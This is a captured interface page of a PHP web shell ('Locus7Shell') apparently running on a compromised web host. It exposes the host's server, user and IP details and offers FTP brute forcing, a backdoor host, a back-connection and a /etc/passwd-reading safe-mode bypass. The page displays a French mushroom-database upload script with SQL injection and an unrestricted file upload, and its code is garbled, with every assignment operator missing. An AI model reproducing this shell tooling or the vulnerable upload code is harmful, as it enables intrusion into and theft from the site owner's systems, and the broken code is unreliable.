Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/   drwx---r-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     ajoutpdfintern.php (1.69 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include ("connect.php");
echo "<span class='Style5'>";
$user $_SESSION['identifiant'];

if (isset($_POST['submit']))
{
//récuperer le fichier envoyé

      $idf $_POST['variete'];
      $pdf $_POST['pdf'];
      $pdf 'pdf'.$pdf;
     $name $_FILES['myfile']['name'];
     $size $_FILES['myfile']['size']; //voir le tutorial upload pour vérifier que c'est une image
 $tmp_name $_FILES['myfile']['tmp_name'];

    $get mysql_query("SELECT * FROM champignons WHERE ID='$idf'");
while ($row mysql_fetch_assoc($get))
     {
      // obtenir données
         $idt $row['ID'];
      $genre $row['GENRE'];
     $espece $row['ESPECE'];
    $variete $row['VARIETE'];
$subdivision $row['SUBDIVISION'];
$title $genre." ".$espece." ".$subdivision." ".$variete;
      }

    if ($idt)
    {
      //Chargement en cours
      $location $pdf."/".$idt.".pdf";
          $date date("Y-m-d");
      move_uploaded_file($tmp_name,$location); //regarder le tutorial pour que personne ne puisse y installer des fichier!!!
      $query mysql_query("UPDATE champignons SET $pdf='$location', DATE_INSCRIPTION='$date' WHERE ID='$idt'");
      echo("<br>Votre pdf est maintenant enregistré. <META HTTP-EQUIV='Refresh' CONTENT='1;URL=index.php?page=deletepdf&delete=2&id=".$idt."'>");
    }
    else
    echo("Sélectionner un fichier!");
}
else
{
        $idv $_GET['variete'];
       $pdf $_GET['pdf'];
echo "<br>Ajouter un pdf :
<form action='index.php?page=ajoutpdfintern' method='POST' enctype='multipart/form-data'>
<input name='variete' type='hidden' value=".$idv." /> <input name='pdf' type='hidden' value=".$pdf." />
Fichier: <input type='file' name='myfile'> <input type='submit' name='submit' value='Charger'>
</form>";
}

echo '</span>';
?>

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 
Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0059 ]--